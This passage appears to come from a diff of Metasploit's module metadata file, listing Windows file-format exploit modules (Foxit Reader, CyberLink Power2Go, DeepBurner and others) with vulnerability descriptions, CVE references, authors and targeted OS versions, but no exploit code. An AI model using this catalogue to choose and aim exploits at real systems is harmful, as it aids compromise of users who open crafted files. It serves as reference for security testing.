"mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/cyberlink_lpp_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/cyberlink_p2g_bof": { + "name": "CyberLink Power2Go name Attribute (p2g) Stack Buffer Overflow Exploit", + "fullname": "exploit/windows/fileformat/cyberlink_p2g_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2011-09-12", + "type": "exploit", + "author": [ + "modpr0be ", + "mr_me " + ], + "description": "This module exploits a stack buffer overflow in CyberLink Power2Go version 8.x\n The vulnerability is triggered when opening a malformed p2g file containing an overly\n long string in the 'name' attribute of the file element. This results in overwriting a\n structured exception handler record.", + "references": [ + "CVE-2011-5171", + "BID-50997", + "OSVDB-77600", + "EDB-18220", + "US-CERT-VU-158003" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "CyberLink Power2Go 8 (XP/Vista/win7) Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/cyberlink_p2g_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/cytel_studio_cy3": { + "name": "Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/cytel_studio_cy3", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-10-02", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "James Fitts " + ], + "description": "This module exploits a stack based buffer overflow found\n in Cytel Studio <= 9.0. The overflow is triggered during the\n copying of strings to a stack buffer of 256 bytes.", + "references": [ + "OSVDB-75991", + "BID-49924", + "URL-http://aluigi.altervista.org/adv/cytel_1-adv.txt" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Cytel Studio 9.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/cytel_studio_cy3.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/cytel_studio_cy3", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/deepburner_path": { + "name": "AstonSoft DeepBurner (DBR File) Path Buffer Overflow", + "fullname": "exploit/windows/fileformat/deepburner_path", + "aliases": [], + "rank": 500, + "disclosure_date": "2006-12-19", + "type": "exploit", + "author": [ + "Expanders", + "fl0 fl0w", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in versions 1.9.0.228,\n 1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc).\n An attacker must send the file to victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n DBR file within a browser, since the DBR extension is registered to DeepBurner.", + "references": [ + "BID-21657", + "OSVDB-32356", + "CVE-2006-6665", + "EDB-2950", + "EDB-8335", + "EDB-11315" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/deepburner_path.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/deepburner_path", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/destinymediaplayer16": { + "name": "Destiny Media Player 1.61 PLS M3U Buffer Overflow", + "fullname": "exploit/windows/fileformat/destinymediaplayer16", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-01-03", + "type": "exploit", + "author": [ + "Trancek " + ], + "description": "This module exploits a stack-based buffer overflow in the Destiny Media Player 1.61.\n An attacker must send the file to victim and the victim must open the file. File-->Open Playlist", + "references": [ + "CVE-2009-3429", + "OSVDB-53249", + "EDB-7651", + "BID-33091" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Destiny Universal", + "Windows XP SP2 Spanish" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/destinymediaplayer16.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/destinymediaplayer16", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/digital_music_pad_pls": { + "name": "Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/digital_music_pad_pls", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-09-17", + "type": "exploit", + "author": [ + "Abhishek Lyall " + ], + "description": "This module exploits a buffer overflow in Digital Music Pad Version 8.2.3.3.4\n When opening a malicious pls file with the Digital Music Pad,\n a remote attacker could overflow a buffer and execute\n arbitrary code.", + "references": [ + "OSVDB-68178", + "URL-http://web.archive.org/web/20100923154433/http://secunia.com:80/advisories/41519", + "EDB-15134" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/fileformat/digital_music_pad_pls.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/digital_music_pad_pls", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/djstudio_pls_bof": { + "name": "DJ Studio Pro 5.1 .pls Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/djstudio_pls_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-12-30", + "type": "exploit", + "author": [ + "Sebastien Duquette", + "Death-Shadow-Dark " + ], + "description": "This module exploits a stack-based buffer overflow in DJ Studio Pro 5.1.6.5.2.\n When handling a .pls file, DJ Studio will copy the user-supplied data on the stack\n without any proper bounds checking done beforehand, therefore allowing code\n execution under the context of the user.", + "references": [ + "CVE-2009-4656", + "OSVDB-58159", + "EDB-10827" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "DJ Studio Pro 5.1.6.5.2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/djstudio_pls_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/djstudio_pls_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/djvu_imageurl": { + "name": "DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow", + "fullname": "exploit/windows/fileformat/djvu_imageurl", + "aliases": [], + "rank": 100, + "disclosure_date": "2008-10-30", + "type": "exploit", + "author": [ + "dean " + ], + "description": "This module exploits a stack buffer overflow in DjVu ActiveX Component. When sending an\n overly long string to the ImageURL() property of DjVu_ActiveX_MSOffice.dll (3.0)\n an attacker may be able to execute arbitrary code. This control is not marked safe\n for scripting, so choose your attack vector accordingly.", + "references": [ + "CVE-2008-4922", + "OSVDB-49592", + "BID-31987" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/djvu_imageurl.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/djvu_imageurl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/documalis_pdf_editor_and_scanner": { + "name": "Documalis Free PDF Editor and Scanner JPEG Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/documalis_pdf_editor_and_scanner", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-05-22", + "type": "exploit", + "author": [ + "metacom", + "metacom27 " + ], + "description": "Documalis Free PDF Editor version 5.7.2.26 and Documalis Free PDF Scanner version 5.7.2.122 do not\n appropriately validate the contents of JPEG images contained within a PDF. Attackers can exploit\n this vulnerability to trigger a buffer overflow on the stack and gain remote code execution as the\n user running the Documalis Free PDF Editor or Documalis Free PDF Scanner software.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10", + "Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10" + ], + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/documalis_pdf_editor_and_scanner", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/dupscout_xml": { + "name": "Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow", + "fullname": "exploit/windows/fileformat/dupscout_xml", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-03-29", + "type": "exploit", + "author": [ + "Daniel Teixeira" + ], + "description": "This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16\n by using the import command option to import a specially crafted xml file.", + "references": [ + "CVE-2017-7310" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/dupscout_xml.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/dupscout_xml", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/dvdx_plf_bof": { + "name": "DVD X Player 5.5 .plf PlayList Buffer Overflow", + "fullname": "exploit/windows/fileformat/dvdx_plf_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-06-02", + "type": "exploit", + "author": [ + "n00b", + "D3r K0n!G", + "sickness", + "sinn3r " + ], + "description": "This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and\n Standard. By supplying a long string of data in a plf file (playlist), the\n MediaPlayerCtrl.dll component will attempt to extract a filename out of the string,\n and then copy it on the stack without any proper bounds checking, which causes a\n buffer overflow, and results in arbitrary code execution under the context of the user.\n\n This module has been designed to target common Windows systems such as:\n Windows XP SP2/SP3, Windows Vista, and Windows 7.", + "references": [ + "CVE-2007-3068", + "OSVDB-36956", + "BID-24278", + "EDB-17745" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "DVD X Player 5.5 Standard / Pro" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/dvdx_plf_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/dvdx_plf_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/easycdda_pls_bof": { + "name": "Easy CD-DA Recorder PLS Buffer Overflow", + "fullname": "exploit/windows/fileformat/easycdda_pls_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-06-07", + "type": "exploit", + "author": [ + "chap0", + "Gabor Seljan", + "juan vazquez " + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in\n Easy CD-DA Recorder 2007 caused by an overlong string in a playlist entry.\n By persuading the victim to open a specially-crafted PLS file, a\n remote attacker can execute arbitrary code on the system or cause\n the application to crash. This module has been tested successfully on\n Windows XP SP3 and Windows 7 SP1.", + "references": [ + "BID-40631", + "EDB-13761", + "OSVDB-65256", + "CVE-2010-2343", + "URL-http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 / Windows 7 SP1 (DEP Bypass)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/easycdda_pls_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/easycdda_pls_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/emc_appextender_keyworks": { + "name": "EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/fileformat/emc_appextender_keyworks", + "aliases": [], + "rank": 200, + "disclosure_date": "2009-09-29", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the KeyWorks KeyHelp ActiveX Control\n (KeyHelp.ocx 1.2.3120.0). This ActiveX Control comes bundled with EMC's\n Documentation ApplicationXtender 5.4.", + "references": [ + "CVE-2012-2515", + "OSVDB-58423", + "BID-36546" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/emc_appextender_keyworks", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/erdas_er_viewer_bof": { + "name": "ERS Viewer 2011 ERS File Handling Buffer Overflow", + "fullname": "exploit/windows/fileformat/erdas_er_viewer_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-04-23", + "type": "exploit", + "author": [ + "Parvez Anwar", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow vulnerability found in ERS Viewer 2011\n (version 11.04). The vulnerability exists in the module ermapper_u.dll where the\n function ERM_convert_to_correct_webpath handles user provided data in an insecure\n way. It results in arbitrary code execution under the context of the user viewing\n a specially crafted .ers file. This module has been tested successfully with ERS\n Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.", + "references": [ + "CVE-2013-0726", + "OSVDB-92694", + "BID-59379", + "URL-http://web.archive.org/web/20130515231047/http://secunia.com/advisories/51725/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "ERS Viewer 2011 (v11.04) / Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/erdas_er_viewer_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/erdas_er_viewer_rf_report_error": { + "name": "ERS Viewer 2013 ERS File Handling Buffer Overflow", + "fullname": "exploit/windows/fileformat/erdas_er_viewer_rf_report_error", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-05-23", + "type": "exploit", + "author": [ + "James Fitts", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow vulnerability found in ERS Viewer 2013.\n The vulnerability exists in the module ermapper_u.dll, where the function\n rf_report_error handles user provided data in an insecure way. It results in\n arbitrary code execution under the context of the user viewing a specially crafted\n .ers file. This module has been tested successfully with ERS Viewer 2013 (versions\n 13.0.0.1151) on Windows XP SP3 and Windows 7 SP1.", + "references": [ + "CVE-2013-3482", + "OSVDB-93650", + "URL-http://web.archive.org/web/20130609135637/http://secunia.com:80/advisories/53620" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "ERS Viewer 2013 13.0.0.1151 / NO DEP / NO ASLR", + "ERS Viewer 2013 13.0.0.1151 / DEP & ASLR bypass" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/erdas_er_viewer_rf_report_error", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/esignal_styletemplate_bof": { + "name": "eSignal and eSignal Pro File Parsing Buffer Overflow in QUO", + "fullname": "exploit/windows/fileformat/esignal_styletemplate_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-09-06", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "TecR0c ", + "mr_me " + ], + "description": "The software is unable to handle the \"\" files (even those\n original included in the program) like those with the registered\n extensions QUO, SUM and POR. Successful exploitation of this\n vulnerability may take up to several seconds due to the use of\n egghunter. Also, DEP bypass is unlikely due to the limited space for\n payload. This vulnerability affects versions 10.6.2425.1208 and earlier.", + "references": [ + "CVE-2011-3494", + "OSVDB-75456", + "BID-49600", + "URL-http://aluigi.altervista.org/adv/esignal_1-adv.txt", + "EDB-17837" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Win XP SP3 / Windows Vista / Windows 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/esignal_styletemplate_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/etrust_pestscan": { + "name": "CA eTrust PestPatrol ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/fileformat/etrust_pestscan", + "aliases": [], + "rank": 200, + "disclosure_date": "2009-11-02", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in CA eTrust PestPatrol. When\n sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9)\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2009-4225", + "OSVDB-60862" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/etrust_pestscan.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/etrust_pestscan", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ezip_wizard_bof": { + "name": "eZip Wizard 3.0 Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/ezip_wizard_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-03-09", + "type": "exploit", + "author": [ + "fl0 fl0w", + "jduck ", + "Lincoln" + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in\n version 3.0 of ediSys Corp.'s eZip Wizard.\n\n In order for the command to be executed, an attacker must convince someone to\n open a specially crafted zip file with eZip Wizard, and access the specially\n file via double-clicking it. By doing so, an attacker can execute arbitrary\n code as the victim user.", + "references": [ + "CVE-2009-1028", + "OSVDB-52815", + "BID-34044", + "URL-http://www.edisys.com/", + "EDB-8180", + "EDB-12059" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ezip_wizard_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ezip_wizard_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/fatplayer_wav": { + "name": "Fat Player Media Player 0.6b0 Buffer Overflow", + "fullname": "exploit/windows/fileformat/fatplayer_wav", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-10-18", + "type": "exploit", + "author": [ + "James Fitts ", + "dookie" + ], + "description": "This module exploits a buffer overflow in Fat Player 0.6b. When\n the application is used to import a specially crafted wav file, a buffer overflow occurs\n allowing arbitrary code execution.", + "references": [ + "CVE-2009-4962", + "OSVDB-57343", + "EDB-15279" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/fatplayer_wav.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/fatplayer_wav", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/fdm_torrent": { + "name": "Free Download Manager Torrent Parsing Buffer Overflow", + "fullname": "exploit/windows/fileformat/fdm_torrent", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-02-02", + "type": "exploit", + "author": [ + "SkD ", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in Free Download Manager\n 3.0 Build 844. Arbitrary code execution could occur when parsing a\n specially crafted torrent file.", + "references": [ + "CVE-2009-0184", + "OSVDB-54033", + "BID-33555", + "URL-http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/vmsBtDownloadManager.cpp?r1=11&r2=18", + "URL-http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/Bittorrent/fdmbtsupp/vmsBtFileImpl.cpp?r1=9&r2=18", + "URL-http://web.archive.org/web/20090205145829/http://secunia.com:80/secunia_research/2009-5", + "URL-http://downloads.securityfocus.com/vulnerabilities/exploits/33555-SkD.pl" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Free Download Manager 3.0 (Build 844)" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/fileformat/fdm_torrent.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/fdm_torrent", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/feeddemon_opml": { + "name": "FeedDemon Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/feeddemon_opml", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-02-09", + "type": "exploit", + "author": [ + "fl0 fl0w", + "dookie", + "jduck " + ], + "description": "This module exploits a buffer overflow in FeedDemon v3.1.0.12. When the application\n is used to import a specially crafted opml file, a buffer overflow occurs allowing\n arbitrary code execution.\n\n All versions are suspected to be vulnerable. This vulnerability was originally reported\n against version 2.7 in February of 2009.", + "references": [ + "CVE-2009-0546", + "OSVDB-51753", + "BID-33630", + "EDB-7995", + "EDB-8010", + "EDB-11379" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/feeddemon_opml.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/feeddemon_opml", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/foxit_reader_filewrite": { + "name": "Foxit PDF Reader 4.2 Javascript File Write", + "fullname": "exploit/windows/fileformat/foxit_reader_filewrite", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-03-05", + "type": "exploit", + "author": [ + "bannedit ", + "Chris Evans" + ], + "description": "This module exploits an unsafe Javascript API implemented in Foxit PDF Reader\n version 4.2. The createDataObject() Javascript API function allows for writing\n arbitrary files to the file system. This issue was fixed in version 4.3.1.0218.\n\n Note: This exploit uses the All Users directory currently, which required\n administrator privileges to write to. This means an administrative user has to\n open the file to be successful. Kind of lame but thats how it goes sometimes in\n the world of file write bugs.", + "references": [ + "OSVDB-71104", + "URL-http://scarybeastsecurity.blogspot.com/2011/03/dangerous-file-write-bug-in-foxit-pdf.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Foxit PDF Reader v4.2 (Windows XP SP0-SP3)", + "Foxit PDF Reader v4.2 (Windows Vista/7/8/2008)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/foxit_reader_filewrite", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/foxit_reader_launch": { + "name": "Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow", + "fullname": "exploit/windows/fileformat/foxit_reader_launch", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-03-09", + "type": "exploit", + "author": [ + "Francisco Falcon", + "bannedit " + ], + "description": "This module exploits a buffer overflow in Foxit Reader 3.0 builds 1301 and earlier.\n Due to the way Foxit Reader handles the input from an \"Launch\" action, it is possible\n to cause a stack-based buffer overflow, allowing an attacker to gain arbitrary code\n execution under the context of the user.", + "references": [ + "CVE-2009-0837", + "OSVDB-55614", + "BID-34035", + "URL-http://www.coresecurity.com/content/foxit-reader-vulnerabilities" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Foxit Reader 3.0 Windows XP SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/foxit_reader_launch.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/foxit_reader_launch", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/foxit_reader_uaf": { + "name": "Foxit PDF Reader Pointer Overwrite UAF", + "fullname": "exploit/windows/fileformat/foxit_reader_uaf", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-04-20", + "type": "exploit", + "author": [ + "mr_me", + "bit from meepwn", + "saelo", + "Jacob Robles" + ], + "description": "Foxit PDF Reader v9.0.1.1049 has a Use-After-Free vulnerability\n in the Text Annotations component and the TypedArray's use\n uninitialized pointers.\n\n The vulnerabilities can be combined to leak a vtable memory address,\n which can be adjusted to point to the base address of the executable.\n A ROP chain can be constructed that will execute when Foxit Reader\n performs the UAF.\n\n This module has been tested on Windows 7 x64, Windows 10 Pro x64\n Build 17134, and Windows 10 Enterprise x64. Windows 10 Enterprise\n must have insecure logons enabled for the exploit to work as expected.", + "references": [ + "CVE-2018-9948", + "CVE-2018-9958", + "ZDI-18-332", + "ZDI-18-342", + "URL-https://srcincite.io/blog/2018/06/22/foxes-among-us-foxit-reader-vulnerability-discovery-and-exploitation.html", + "URL-https://srcincite.io/pocs/cve-2018-99{48,58}.pdf.txt" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 10 Pro x64 Build 17134" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/foxit_reader_uaf.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/foxit_reader_uaf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/foxit_title_bof": { + "name": "Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/foxit_title_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-11-13", + "type": "exploit", + "author": [ + "dookie", + "Sud0", + "corelanc0d3r ", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in Foxit PDF Reader prior to version\n 4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that\n contains an overly long string in the Title field. This results in overwriting a\n structured exception handler record.\n\n NOTE: This exploit does not use javascript.", + "references": [ + "OSVDB-68648", + "EDB-15532", + "URL-http://www.corelan.be:8800/index.php/2010/11/13/offensive-security-exploit-weekend/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Foxit Reader v4.1.1 XP Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/foxit_title_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/foxit_title_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/free_mp3_ripper_wav": { + "name": "Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/free_mp3_ripper_wav", + "aliases": [], + "rank": 500, + "disclosure_date": "2011-08-27", + "type": "exploit", + "author": [ + "Richard Leahy", + "X-h4ck", + "Tiago Henriques", + "James Fitts " + ], + "description": "This module exploits a stack based buffer overflow found in Free MP3 CD\n Ripper 1.1. The overflow is triggered when an unsuspecting user opens a malicious\n WAV file.", + "references": [ + "CVE-2011-5165", + "OSVDB-63349", + "EDB-11975", + "EDB-17727" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 EN" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/free_mp3_ripper_wav", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/galan_fileformat_bof": { + "name": "gAlan 0.2.1 Buffer 